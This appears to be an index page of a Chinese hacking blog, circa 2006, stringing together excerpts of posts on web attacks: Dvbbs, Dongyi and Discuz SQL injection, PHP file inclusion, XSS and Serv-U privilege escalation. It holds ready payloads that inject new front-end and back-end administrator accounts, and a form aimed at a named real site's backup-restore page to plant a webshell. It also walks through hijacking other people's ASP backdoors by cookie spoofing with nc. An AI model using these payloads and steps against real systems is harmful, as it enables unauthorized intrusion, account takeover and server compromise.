信息来源:h4x0r's blog

前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL 后面就是SQL语句啦

返回信息：
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp，行 32

针对mssql的
NBSI 直接列目录 >备份> ok!

---------------------------------------------------------------------------
discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------

» 阅读全文

发布日期：2006-10-21
漏洞发现：Bug.Center.Team

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句

» 阅读全文

作者: 疯狗
经常听到php文件包含漏洞,前一阵子贱心发现的BO-BLOG漏洞就是文件包含漏洞,可以用来执行一些命令,这个文件包含到底是怎样形成鸟?

可以简单的理解为乱用include();

$id=$_GET["id"]; include($id);

稀里糊涂的就把$id这个变量给引用了,但是不要单纯的理解为这个漏洞就是include了变量,include了文件也是有可能利用的,这个稍后在做介绍……

» 阅读全文

思路是通过提交的COOKIE来查看木马的原代码，找出密码
看下面的代码
if trim(request.form("password"))=kiki then
response.cookies("password")="allen" <|>密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() <|>密码错误
response.end <|>停止运行
注意：response.cookies("password")="allen"
他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。
还是实战一次：
1 找到一个后门，呵呵，不是我的，
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字，你也可以换成别的，注意一定要加引号，表示不拆分字符串查询。
这样就找到了许多，呵呵，我选了一个，路径http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马，然后找到自己木马的路径，停！打开winsock expert选择监视对应的IE，然后回到IE点编辑，此时，IE显示出你的木马的原代码了，转到winsock expert 在前几行有一个用get 方法给你的木马的数据，我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/pic.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么？这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/ima...
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了，保存在文本。
3 提交我们的数据
进入命令行，进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令，直接打开NC无法保存数据
呆会会提示连接成功，然后我门将作好的COOKIE粘贴在里面，然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码，

<|>修改下面的kiki改为你密码
if trim(request.form("password"))=kiki then
哈哈，看到密码了，然后登陆吧，再改了密码，这个木马就是你的了。

【前言】

本文主要介绍跨站脚本执行漏洞的成因，形式，危害，利用方式，隐藏技巧，解决方法和常见问题 （FAQ），由于目前介绍跨站脚本执行漏洞的资料还不是很多，而且一般也不是很详细，所以希望本文能够 比较详细的介绍该漏洞。由于时间仓促，水平有限，本文可能有不少错误，希望大家不吝赐教。

声明，请不要利用本文介绍的任何内容，代码或方法进行破坏，否则一切后果自负！

【漏洞成因】
原因很简单，就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

» 阅读全文

文章来源：深白blog
增加前台管理员用户名：
coolidea|||123',0);update/**/Dv_User/**/set/**/UsergroupID='1'/**/where[UserName]='h4x0r';--

加后台管理员用户：
coolidea|||123',0);Insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('469e80d32c0559f8','h4x0r','h4x0r','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,');--

拿webshell
<form action="http://www.zhsc.net/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置：<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>

不必要在注入拿SHELL了，很方便

只针对SQL版有效~

文章作者：kon-bluesky
不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.
利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.
下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了

» 阅读全文

Author：lake2 ( http://lake2.0x54.org )

最近的生活真无聊，寒冰掌老大见我无所事事，就说如果我能把serv-u本地提权的ASP程序做出来就给介绍个MM，所以呢，就有了这篇文章^_^

serv-u本地提权的问题很古老了，不清楚的朋友谷歌一下先，我就不罗嗦啦。呵呵，最主要的是相继出现了php、perl、aspx版本的提权脚本，一时间刀光剑影满天飞，惟独缺了ASP版的。主要是由于郁闷的ASP不能像其他脚本那样访问Socket（另一个原因是因为老大没早点对我用美眉计^_^）。

» 阅读全文

书写错误，导致恶意用户构造语句可以写入webshell，进而控制整个服务器。
前几个晚上，把前台文件，只要是数据库调用中的变量都看了一遍。看看是不是有过滤不严的地方，看完后觉得，过滤不严的地方的确不少，但是都已经被单引号保护起来了。在php中，如果magic_qoute_gpc=on（默认的）编译器会自动把单引号等特殊字符转义，而这个时候我们想改变程序的执行流程是非常困难的。这样大大的增加了入侵的难度，在某种程度上，也的确保证了其安全。这也是为什么朋友提出一定要在magic_qoute_gpc为on的时候依然可以利用的要求。如果需要单引号介入才能利用的漏洞，在Discuz!论坛中基本上是没什么用处的。

» 阅读全文